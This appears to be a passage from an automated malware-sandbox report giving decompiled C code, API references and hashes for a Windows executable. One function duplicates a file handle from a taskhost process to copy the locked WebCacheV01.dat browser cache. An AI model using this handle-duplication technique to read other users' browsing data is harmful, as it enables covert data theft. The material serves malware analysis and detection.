Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memsetwcslen$DeleteFileFolderPathSpecialwcscatwcscpy
String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$dllhost.exe$ecv$taskhost.exe$taskhostex.exe$taskhostw.exe
API String ID: 2175868439-3212516833
Opcode ID: 24fc45b670e89c90fc9f8dccd731adadcc036b3d9691952aae2eeb5ea30e9faf
Instruction ID: a022d5ce61393d47798dcb13383e44886591ba6ad6dcc354a4b6cd20eba80d87
Opcode Fuzzy Hash: 24fc45b670e89c90fc9f8dccd731adadcc036b3d9691952aae2eeb5ea30e9faf
Instruction Fuzzy Hash: 4B41677291061996DB10EFA5DC85ADE73BCEF04319F10457FE505F21C2EB38AB488B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0A4, Relevance: 18.1, APIs: 12, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 32%

			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t35;
				intOrPtr* _t37;
				intOrPtr* _t38;
				void* _t41;
				intOrPtr _t43;
				intOrPtr _t47;
				signed int _t49;
				signed int _t51;
				int _t53;
				int _t54;
				signed int _t56;
				signed int _t57;
				signed int _t58;
				int _t61;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				void* _t67;
				signed int _t71;
				int _t72;
				void* _t73;
				intOrPtr _t81;

				_t67 = __edx;
				_push(0x70);
				_push(0x40f3f0);
				E0040E2B8(__ebx, __edi, __esi);
				_t35 = GetModuleHandleA(0);
				if(_t35->i != 0x5a4d) {
					L4:
					 *(_t73 - 0x1c) = 0;
				} else {
					_t66 =  *((intOrPtr*)(_t35 + 0x3c)) + _t35;
					if( *_t66 != 0x4550) {
						goto L4;
					} else {
						_t57 =  *(_t66 + 0x18) & 0x0000ffff;
						if(_t57 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t66 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t66 + 0x74)) <= 0xe) {
								goto L4;
							} else {
								_t58 = 0;
								__eflags =  *(_t66 + 0xe8);
								goto L9;
							}
						} else {
							if(_t57 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t66 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t66 + 0x84)) <= 0xe) {
									goto L4;
								} else {
									_t58 = 0;
									__eflags =  *(_t66 + 0xf8);
									L9:
									_t9 = __eflags != 0;
									__eflags = _t9;
									 *(_t73 - 0x1c) = _t58 & 0xffffff00 | _t9;
								}
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t73 - 4) = 0;
				_t61 = 2;
				__set_app_type(_t61);
				 *0x413700 =  *0x413700 | 0xffffffff;
				 *0x413704 =  *0x413704 | 0xffffffff;
				_t37 = __p__fmode();
				_t63 =  *0x41238c; // 0x0
				 *_t37 = _t63;
				_t38 = __p__commode();
				_t64 =  *0x412388; // 0x0
				 *_t38 = _t64;
				 *0x4136fc =  *_adjust_fdiv;
				_t41 = E0040E2B2();
				_t81 =  *0x412000; // 0x1
				if(_t81 == 0) {
					__setusermatherr(E0040E2B2);
					_pop(_t64);
				}
				E0040E2A0(_t41);
				L0040E29A();
				_t43 =  *0x412384; // 0x0
				 *((intOrPtr*)(_t73 - 0x20)) = _t43;
				_t47 = _t73 - 0x2c;
				__imp____wgetmainargs(_t47, _t73 - 0x28, _t73 - 0x24,  *0x412380, _t73 - 0x20, 0x40f3c0, 0x40f3c4); // executed
				 *((intOrPtr*)(_t73 - 0x30)) = _t47;
				_push(0x40f3bc);
				_push(0x40f394); // executed
				L0040E29A(); // executed
				_t71 =  *__imp___wcmdln;
				if(_t71 != 0) {
					 *(_t73 - 0x34) = _t71;
					__eflags =  *_t71 - 0x22;
					if( *_t71 != 0x22) {
						while(1) {
							__eflags =  *_t71 - 0x20;
							if( *_t71 <= 0x20) {
								goto L19;
							}
							_t71 = _t71 + _t61;
							 *(_t73 - 0x34) = _t71;
						}
					} else {
						while(1) {
							_t71 = _t71 + _t61;
							 *(_t73 - 0x34) = _t71;
							_t56 =  *_t71;
							__eflags = _t56;
							if(_t56 == 0) {
								break;
							}
							__eflags = _t56 - 0x22;
							if(_t56 != 0x22) {
								continue;
							}
							break;
						}
						__eflags =  *_t71 - 0x22;
						if( *_t71 == 0x22) {
							L18:
							_t71 = _t71 + _t61;
							__eflags = _t71;
							 *(_t73 - 0x34) = _t71;
						}
					}
					L19:
					_t49 =  *_t71;
					__eflags = _t49;
					if(_t49 != 0) {
						__eflags = _t49 - 0x20;
						if(_t49 <= 0x20) {
							goto L18;
						}
					}
					 *(_t73 - 0x4c) = 0;
					GetStartupInfoW(_t73 - 0x78);
					__eflags =  *(_t73 - 0x4c) & 0x00000001;
					if(__eflags == 0) {
						_t51 = 0xa;
					} else {
						_t51 =  *(_t73 - 0x48) & 0x0000ffff;
					}
					_t53 = E0040BE98(_t64, _t67, __eflags, GetModuleHandleA(0), 0, _t71, _t51); // executed
					_t72 = _t53;
					 *(_t73 - 0x7c) = _t72;
					__eflags =  *(_t73 - 0x1c);
					if( *(_t73 - 0x1c) == 0) {
						exit(_t72); // executed
					}
					__imp___cexit();
					_t32 = _t73 - 4;
					 *_t32 =  *(_t73 - 4) | 0xffffffff;
					__eflags =  *_t32;
					_t54 = _t72;
				} else {
					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
					_t54 = 0xff;
				}
				return E0040E2F1(_t54);
			}

0x0040e0a4
0x0040e0a4
0x0040e0a6
0x0040e0ab
0x0040e0b3
0x0040e0be
0x0040e0df
0x0040e0df
0x0040e0c0
0x0040e0c3
0x0040e0cb
0x00000000
0x0040e0cd
0x0040e0cd
0x0040e0d6
0x0040e0f7
0x0040e0fb
0x00000000
0x0040e0fd
0x0040e0fd
0x0040e0ff
0x00000000
0x0040e0ff
0x0040e0d8
0x0040e0dd
0x0040e0e4
0x0040e0eb
0x00000000
0x0040e0ed
0x0040e0ed
0x0040e0ef
0x0040e105
0x0040e105
0x0040e105
0x0040e108
0x0040e108
0x00000000
0x00000000
0x00000000
0x0040e0dd
0x0040e0d6
0x0040e0cb
0x0040e10b
0x0040e110
0x0040e112
0x0040e119
0x0040e120
0x0040e127
0x0040e12d
0x0040e133
0x0040e135
0x0040e13b
0x0040e141
0x0040e14a
0x0040e14f
0x0040e154
0x0040e15a
0x0040e161
0x0040e167
0x0040e167
0x0040e168
0x0040e177
0x0040e17c
0x0040e181
0x0040e196
0x0040e19a
0x0040e1a0
0x0040e1a3
0x0040e1a8
0x0040e1ad
0x0040e1ba
0x0040e1be
0x0040e1ce
0x0040e1d1
0x0040e1d5
0x0040e21c
0x0040e21c
0x0040e220
0x00000000
0x00000000
0x0040e222
0x0040e224
0x0040e224
0x0040e1d7
0x0040e1d7
0x0040e1d7
0x0040e1d9
0x0040e1dc
0x0040e1df
0x0040e1e2
0x00000000
0x00000000
0x0040e1e4
0x0040e1e8
0x00000000
0x00000000
0x00000000
0x0040e1e8
0x0040e1ea
0x0040e1ee
0x0040e1f0
0x0040e1f0
0x0040e1f0
0x0040e1f2
0x0040e1f2
0x0040e1ee
0x0040e1f5
0x0040e1f5
0x0040e1f8
0x0040e1fb
0x0040e1fd
0x0040e201
0x00000000
0x00000000
0x0040e201
0x0040e203
0x0040e20a
0x0040e210
0x0040e214
0x0040e22b
0x0040e216
0x0040e216
0x0040e216
0x0040e237
0x0040e23c
0x0040e23e
0x0040e241
0x0040e244
0x0040e247
0x0040e247
0x0040e24d
0x0040e282
0x0040e282
0x0040e282
0x0040e286
0x0040e1c0
0x0040e1c0
0x0040e1c4
0x0040e1c4
0x0040e28d

APIs

GetModuleHandleA.KERNEL32(00000000,0040F3F0,00000070), ref: 0040E0B3
__set_app_type.MSVCRT ref: 0040E112
__p__fmode.MSVCRT ref: 0040E127
__p__commode.MSVCRT ref: 0040E135
__setusermatherr.MSVCRT ref: 0040E161
_initterm.MSVCRT ref: 0040E177
__wgetmainargs.KERNELBASE ref: 0040E19A
_initterm.MSVCRT ref: 0040E1AD
GetStartupInfoW.KERNEL32(?), ref: 0040E20A
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040E230
exit.KERNELBASE ref: 0040E247
_cexit.MSVCRT ref: 0040E24D

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
String ID:
API String ID: 2827331108-0
Opcode ID: 40245389f9c07c4b53f7ef00b130c55aa1205e514562832f366077bc809bb39d
Instruction ID: c002ea54ac36ed1473f3b1447c0311433b5c4b2607527e15f7219f70d0093426
Opcode Fuzzy Hash: 40245389f9c07c4b53f7ef00b130c55aa1205e514562832f366077bc809bb39d
Instruction Fuzzy Hash: C251A071C40215DBCB34AFA6D9489AD7BB4EB04310F20897FE821BB2E1D7794D96DB48

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5E9, Relevance: 18.1, APIs: 12, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C5E9(void* __eflags, void* _a4, long _a8, void* _a12, long _a16) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				intOrPtr _v16;
				struct _OVERLAPPED* _v20;
				char _v24;
				void* __edi;
				void* __esi;
				void* _t38;
				void* _t41;
				void* _t49;
				void* _t52;
				int _t55;
				int _t57;
				void* _t67;

				_t57 = 0;
				_v8 = 0;
				_v12 = 0;
				_t38 = E0040C6FB(_a4, __eflags, _a8, _a12,  &_v8,  &_v12); // executed
				if(_t38 != 0) {
					_v24 = 0;
					_v20 = 0;
					_v16 = 0x1388;
					E00406729(0x8000,  &_v24);
					_t41 = OpenProcess(0x40, 0, _v8);
					_v8 = _t41;
					if(_t41 != 0) {
						_a12 = 0;
						DuplicateHandle(_v8, _v12, GetCurrentProcess(),  &_a12, 0x80000000, 0, 0); // executed
						if(_a12 != 0) {
							_a8 = GetFileSize(_a12, 0);
							_a4 = E00405351(_a16);
							_t49 = CreateFileMappingW(_a12, 0, 2, 0, 0, 0); // executed
							_v12 = _t49;
							if(_t49 != 0) {
								_t52 = MapViewOfFile(_t49, 4, 0, 0, _a8); // executed
								_t67 = _t52;
								if(_t67 != 0) {
									_a16 = 0;
									_t55 = WriteFile(_a4, _t67, _a8,  &_a16, 0); // executed
									_t57 = _t55;
									UnmapViewOfFile(_t67);
								}
								FindCloseChangeNotification(_v12); // executed
							}
							CloseHandle(_a4);
							CloseHandle(_a12);
						}
						CloseHandle(_v8);
					}
					E00406710( &_v24);
				}
				return _t57;
			}

0x0040c601
0x0040c603
0x0040c606
0x0040c609
0x0040c610
0x0040c620
0x0040c623
0x0040c626
0x0040c62d
0x0040c638
0x0040c640
0x0040c643
0x0040c654
0x0040c664
0x0040c673
0x0040c682
0x0040c694
0x0040c697
0x0040c69f
0x0040c6a2
0x0040c6ac
0x0040c6b2
0x0040c6b6
0x0040c6c0
0x0040c6c7
0x0040c6ce
0x0040c6d0
0x0040c6d0
0x0040c6d9
0x0040c6d9
0x0040c6de
0x0040c6e3
0x0040c6e3
0x0040c6e8
0x0040c6e8
0x0040c6ed
0x0040c6f3
0x0040c6f8

APIs

Part of subcall function 0040C6FB: memset.MSVCRT ref: 0040C725
Part of subcall function 0040C6FB: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000), ref: 0040C74C
Part of subcall function 0040C6FB: FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000), ref: 0040C762
Part of subcall function 0040C6FB: GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040C76A
Part of subcall function 0040C6FB: _wcsicmp.MSVCRT ref: 0040C816

Part of subcall function 00406729: ??3@YAXPAX@Z.MSVCRT ref: 00406730
Part of subcall function 00406729: ??2@YAPAXI@Z.MSVCRT ref: 0040673E

OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C638
GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C657
DuplicateHandle.KERNELBASE(00000000,?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C664
GetFileSize.KERNEL32(?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C679

Part of subcall function 00405351: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363

CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C697
MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00001388,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6AC
WriteFile.KERNELBASE(?,00000000,00001388,?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6C7
UnmapViewOfFile.KERNEL32(00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6D0
FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6D9
CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6DE
CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6E3
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6E8

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationView$??2@??3@DuplicateMappingOpenSizeUnmapWrite_wcsicmpmemset
String ID:
API String ID: 3028965261-0
Opcode ID: 7fd0803a30c83c5bc1aafd51a2f712348a4be379966129774f9c7ee5fc6ab5be
Instruction ID: e6db179c7e43cd6fbe3270d478d1169048f03751868c197fc0ca6440827a8631
Opcode Fuzzy Hash: 7fd0803a30c83c5bc1aafd51a2f712348a4be379966129774f9c7ee5fc6ab5be
Instruction Fuzzy Hash: DD31F5B5800209FFDB11AFA5DD889AE7BB9FB08344F10443AF905B6260D7758E54DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040DACC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040DACC(wchar_t* __ebx, void* __ecx) {
				void* _v8;
				char _v72;
				void _v590;
				long _v592;
				void* __esi;
				void* _t25;
				void* _t27;
				intOrPtr _t38;

				_t27 = __ecx;
				_t26 = __ebx;
				E0040DA9D();
				_t38 =  *0x413264; // 0x74a43bb0
				if(_t38 == 0) {
					_v592 = 0;
					memset( &_v590, 0, 0x206);
					_t3 =  &_v8; // 0x403a63
					if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", 0, 0x20019, _t3) == 0) {
						_t5 =  &_v8; // 0x403a63
						E0040D6BF(0x104, _t27,  &_v592,  *_t5,  &_v72);
						RegCloseKey(_v8);
					}
					wcscpy(_t26,  &_v592);
					return 0 |  *_t26 != 0x00000000;
				}
				E004058FB();
				_t25 =  *0x413264(0, __ebx, 0x1c, 0); // executed
				return _t25;
			}

0x0040dacc
0x0040dacc
0x0040dad6
0x0040dadd
0x0040dae3
0x0040db04
0x0040db0b
0x0040db13
0x0040db2f
0x0040db36
0x0040db44
0x0040db4e
0x0040db54
0x0040db5d
0x00000000
0x0040db69
0x0040dae5
0x0040daef
0x00000000

APIs

Part of subcall function 0040DA9D: LoadLibraryW.KERNEL32(shell32.dll,0040BEBF,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040DAAB
Part of subcall function 0040DA9D: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040DAC0

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040DAEF
memset.MSVCRT ref: 0040DB0B
RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00020019,c:@,?,?,?), ref: 0040DB27
RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0040DB4E
wcscpy.MSVCRT ref: 0040DB5D

Part of subcall function 004058FB: GetVersionExW.KERNEL32(00412B18,?,0040DAEA,?), ref: 00405915

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040DB1D
c:@, xrefs: 0040DB13, 0040DB36, 0040DB16

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseFolderLibraryLoadOpenPathProcSpecialVersionmemsetwcscpy
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$c:@
API String ID: 2249099915-3068728944
Opcode ID: f480cd8af7d095bfef13feb9d9cc8ebde1203ca612b0bf388242ca1e0458cdbf
Instruction ID: c666c52b0d5343781dad8f8333b9175691e3d2dec84d7c30fbf64d54c1d05659
Opcode Fuzzy Hash: f480cd8af7d095bfef13feb9d9cc8ebde1203ca612b0bf388242ca1e0458cdbf
Instruction Fuzzy Hash: FE01D671905214AED720BB95AD4AEEF777CDF84304F2000BAF909B10D2EA745E88DA69

Uniqueness

Uniqueness Score: -1.00%

Function 0040E490, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040E490() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x413270; // 0x2100048
				if(_t1 != 0) {
					_push(_t1); // executed
					L0040E032(); // executed
				}
				_t2 =  *0x413278; // 0x6c7120
				if(_t2 != 0) {
					_push(_t2);
					L0040E032();
				}
				_t3 =  *0x413274; // 0x6c7930
				if(_t3 != 0) {
					_push(_t3);
					L0040E032();
				}
				_t4 =  *0x41327c; // 0x6c7528
				if(_t4 != 0) {
					_push(_t4); // executed
					L0040E032(); // executed
					return _t4;
				}
				return _t4;
			}

0x0040e490
0x0040e497
0x0040e499
0x0040e49a
0x0040e49f
0x0040e4a0
0x0040e4a7
0x0040e4a9
0x0040e4aa
0x0040e4af
0x0040e4b0
0x0040e4b7
0x0040e4b9
0x0040e4ba
0x0040e4bf
0x0040e4c0
0x0040e4c7
0x0040e4c9
0x0040e4ca
0x00000000
0x0040e4cf
0x0040e4d0

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040E49A
??3@YAXPAX@Z.MSVCRT ref: 0040E4AA
??3@YAXPAX@Z.MSVCRT ref: 0040E4BA
??3@YAXPAX@Z.MSVCRT ref: 0040E4CA

Strings

(ul, xrefs: 0040E4C0
ql, xrefs: 0040E4A0
0yl, xrefs: 0040E4B0

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID: ql$(ul$0yl
API String ID: 613200358-2034666865
Opcode ID: e004985c1492cb0ade7af50552a73d1fc351eb5532b0270d2b9bcc4f993dbcb7
Instruction ID: b52db2e07b3ad488cd6e1e6deac71131c93cc09f27119b6233636937a2a2f9d5
Opcode Fuzzy Hash: e004985c1492cb0ade7af50552a73d1fc351eb5532b0270d2b9bcc4f993dbcb7
Instruction Fuzzy Hash: 65E01970300211A6DE28AA3BEC41A03238C3A003AA318CC7AF404F72E0CA7CE860882C

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB15, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040BB15(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t35;
				intOrPtr _t37;
				intOrPtr _t38;
				struct HICON__* _t42;
				void* _t48;
				intOrPtr* _t50;
				intOrPtr* _t57;
				intOrPtr* _t59;
				void* _t60;

				_t59 =  *((intOrPtr*)(_t60 + 0xc));
				 *((intOrPtr*)(_t59 + 0x208)) = 0;
				 *((intOrPtr*)(_t59 + 0x244)) = 0;
				 *((intOrPtr*)(_t59 + 0x274)) = 0;
				 *((intOrPtr*)(_t59 + 0x240)) = 0;
				 *_t59 = 0x410438;
				_t35 = _t59 + 0x6ac;
				 *((intOrPtr*)(_t59 + 0x694)) = 0;
				_t50 = _t59 + 0x6c4;
				 *((intOrPtr*)(_t35 + 0xc)) = 0;
				 *_t35 = 0;
				 *((intOrPtr*)(_t35 + 4)) = 0;
				 *((intOrPtr*)(_t35 + 0x10)) = 0x100;
				 *((intOrPtr*)(_t35 + 8)) = 0;
				E0040133A(_t50);
				 *_t50 = 0x40f7b8;
				_t37 = E0040167A(_t50 + 0x40);
				 *((short*)(_t50 + 0x80)) = 0;
				 *((intOrPtr*)(_t50 + 0x2080)) = 1;
				 *((intOrPtr*)(_t50 + 0x2084)) = 1;
				 *((intOrPtr*)(_t50 + 0x2088)) = 1;
				_push(0x2238);
				 *((intOrPtr*)(_t50 + 4)) = 0x72;
				 *((intOrPtr*)(_t50 + 0x74)) = 0;
				 *((intOrPtr*)(_t50 + 0x78)) = 0;
				L0040E038(); // executed
				if(_t37 == 0) {
					_t37 = 0;
					__eflags = 0;
				} else {
					 *((intOrPtr*)(_t37 + 0x14)) = 1;
					 *((short*)(_t37 + 0x18)) = 0;
					 *((short*)(_t37 + 0x228)) = 0;
					 *((intOrPtr*)(_t37 + 0x2228)) = 1;
					 *((intOrPtr*)(_t37 + 0x222c)) = 1;
					 *((intOrPtr*)(_t37 + 0x2230)) = 1;
					 *0x412b14 = _t37;
				}
				 *((intOrPtr*)(_t59 + 0x698)) = _t37;
				L0040E038();
				_t63 = _t37;
				_t48 = 0xc00;
				if(_t37 == 0) {
					_t38 = 0;
					__eflags = 0;
				} else {
					_t38 = E0040219B(_t37, _t63);
				}
				_t57 = _t59 + 0x27c;
				 *_t57 = 0;
				 *((intOrPtr*)(_t59 + 0x69c)) = _t38;
				E00401000(_t59 + 0x492, _t48, 0x412054);
				 *_t57 = 0;
				 *((intOrPtr*)(_t59 + 0x284)) = 0;
				 *((intOrPtr*)(_t59 + 0x280)) = 0;
				 *((intOrPtr*)(_t59 + 0x278)) = 0;
				 *((intOrPtr*)(_t59 + 0x6a0)) = 0;
				_t42 = LoadIconW(GetModuleHandleW(0), 0x65); // executed
				E00401879(_t59, _t42);
				return _t59;
			}

0x0040bb19
0x0040bb1e
0x0040bb24
0x0040bb2a
0x0040bb30
0x0040bb36
0x0040bb3d
0x0040bb43
0x0040bb4a
0x0040bb52
0x0040bb55
0x0040bb57
0x0040bb5a
0x0040bb61
0x0040bb64
0x0040bb6c
0x0040bb72
0x0040bb7a
0x0040bb81
0x0040bb87
0x0040bb8d
0x0040bb93
0x0040bb98
0x0040bb9f
0x0040bba2
0x0040bba5
0x0040bbad
0x0040bbd6
0x0040bbd6
0x0040bbaf
0x0040bbaf
0x0040bbb2
0x0040bbb6
0x0040bbbd
0x0040bbc3
0x0040bbc9
0x0040bbcf
0x0040bbcf
0x0040bbdd
0x0040bbe3
0x0040bbe8
0x0040bbea
0x0040bbeb
0x0040bbf4
0x0040bbf4
0x0040bbed
0x0040bbed
0x0040bbed
0x0040bbf6
0x0040bbfc
0x0040bc09
0x0040bc0f
0x0040bc17
0x0040bc19
0x0040bc1f
0x0040bc25
0x0040bc2b
0x0040bc3a
0x0040bc43
0x0040bc4e

APIs

Part of subcall function 0040133A: memset.MSVCRT ref: 0040134C

Part of subcall function 0040167A: memset.MSVCRT ref: 00401690

??2@YAPAXI@Z.MSVCRT ref: 0040BBA5
??2@YAPAXI@Z.MSVCRT ref: 0040BBE3
GetModuleHandleW.KERNEL32(00000000,?,00002238), ref: 0040BC31
LoadIconW.USER32(00000000,00000065), ref: 0040BC3A

Strings

@@l, xrefs: 0040BBCF
T A, xrefs: 0040BC04

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@memset$HandleIconLoadModule
String ID: @@l$T A
API String ID: 2596266805-1514656134
Opcode ID: 28f27a63e90cc815c55cb4a811d49b2e7c75855d82e05ab2895167a3b64a2cb9
Instruction ID: b1f1b1f427025bd6f8a5dd4ebf1048772c532f9d5de5c5214c9bf7dacc49333d
Opcode Fuzzy Hash: 28f27a63e90cc815c55cb4a811d49b2e7c75855d82e05ab2895167a3b64a2cb9
Instruction Fuzzy Hash: 1F31ACB19013559FC720DF6989886CABBE8FF08300F11867FE84CDB261D7B89654CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406785, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00406785() {
				void* _t25;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x413288;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x413288 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41328c = 0x100;
					 *0x413290 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27); // executed
					L0040E038(); // executed
					 *0x413270 = _t27;
					_t28 =  *0x41328c; // 0x100
					_t52 = 4;
					_t29 = _t28 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040E038();
					 *0x413278 = _t29;
					_t30 =  *0x41328c; // 0x100
					_t54 = 4;
					_t31 = _t30 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040E038();
					 *0x41327c = _t31;
					_t32 =  *0x413290; // 0x1000
					_t56 = 2;
					_t33 = _t32 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33); // executed
					L0040E038(); // executed
					 *0x413274 = _t33;
					return _t33;
				}
				return _t25;
			}

0x00406785
0x0040678c
0x0040679b
0x0040679c
0x004067a1
0x004067a6
0x004067b0
0x004067be
0x004067bf
0x004067c4
0x004067c9
0x004067d2
0x004067d3
0x004067dc
0x004067dd
0x004067e2
0x004067e7
0x004067f0
0x004067f1
0x004067fa
0x004067fb
0x00406800
0x00406805
0x0040680e
0x0040680f
0x00406818
0x00406819
0x00406821
0x00000000
0x00406821
0x00406826

APIs

??2@YAPAXI@Z.MSVCRT ref: 004067BF
??2@YAPAXI@Z.MSVCRT ref: 004067DD
??2@YAPAXI@Z.MSVCRT ref: 004067FB
??2@YAPAXI@Z.MSVCRT ref: 00406819

Strings

(ul, xrefs: 00406800
ql, xrefs: 004067E2
0yl, xrefs: 00406821

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@
String ID: ql$(ul$0yl
API String ID: 1033339047-2034666865
Opcode ID: 8ab13f23862ced8c753b30d0abc2faf3e5d18bbc6e8aa25b2abc565fa32c18db
Instruction ID: 453b2fe8fef47dc3e01595af69639ea7307b60866b1d7e5282fab9a2940fa031
Opcode Fuzzy Hash: 8ab13f23862ced8c753b30d0abc2faf3e5d18bbc6e8aa25b2abc565fa32c18db
